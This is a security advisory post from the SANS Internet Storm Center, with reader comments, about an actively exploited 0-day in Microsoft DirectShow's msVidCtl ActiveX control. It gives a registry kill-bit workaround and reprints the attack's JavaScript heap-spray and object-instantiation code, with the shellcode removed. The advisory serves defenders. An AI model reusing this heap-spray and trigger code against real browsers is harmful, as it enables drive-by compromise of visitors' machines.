Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: 0-day in Microsoft DirectShow (msvidctl.dll) used in drive-by attacks - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
0-day in Microsoft DirectShow (msvidctl.dll) used in drive-by attacks

A 0-day exploit within the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The code has been published in the public domain via a number of Chinese web sites.

Please keep a watchful eye on your AV and IDS/IPS vendors updates to ensure coverage as early as possible on this exploit as it is likely to be widely deployed with the code being available.

A valid work around for the attack vector is available which set's the kill bit on the vulnerable DLL.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400 

Details of the exploit are available on the CSIS web site, but are included below:


var appllaa='0';

var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;

[SHELL CODE REMOVED]

var headersize=20;

var omybro=unescape(nndx);

var slackspace=headersize+dashell.length;

while(omybro.length<slackspace)

omybro+=omybro;

bZmybr=omybro.substring(0,slackspace);

shuishiMVP=omybro.substring(0,omybro.length-slackspace);

while(shuishiMVP.length+slackspace<0x30000)

shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;

memory=new Array();

for(x=0;x<300;x++)

memory[x]=shuishiMVP+dashell;

var myObject=document.createElement('object');

DivID.appendChild(myObject);

myObject.width='1';

myObject.height='1';

myObject.data='./logo.gif';

myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

 

Stephen

89 Posts
ISC Handler
Please note that there is a typo in the CSIS link embedded in the text, it has a double "http://". The correct URL is http://www.csis.dk/en/news/news.asp?tekstID=799
Elton

2 Posts Posts
Thanks, fixed
Stephen

89 Posts Posts
ISC Handler
Hi,
Can We Get The English Version For The Same
hcbhatt

14 Posts Posts
Google does a fair job:

translate.google.com/…=
Stephen

89 Posts Posts
ISC Handler
Hi,
Can We Get The English Version For The Same
hcbhatt

14 Posts Posts
Thanks Stephen.
hcbhatt

14 Posts Posts
Thanks Stephen.
hcbhatt

14 Posts Posts
Microsoft has issued an advisory, here:

http://www.microsoft.com/technet/security/advisory/972890.mspx

This is still an early notice, but includes 45 CLASSIDs for this control, which they do not believe are designed to be exposed via Internet Explorer and thus should be safe to killbit.
Andrew

41 Posts Posts

Sign Up for Free or Log In to start participating in the conversation!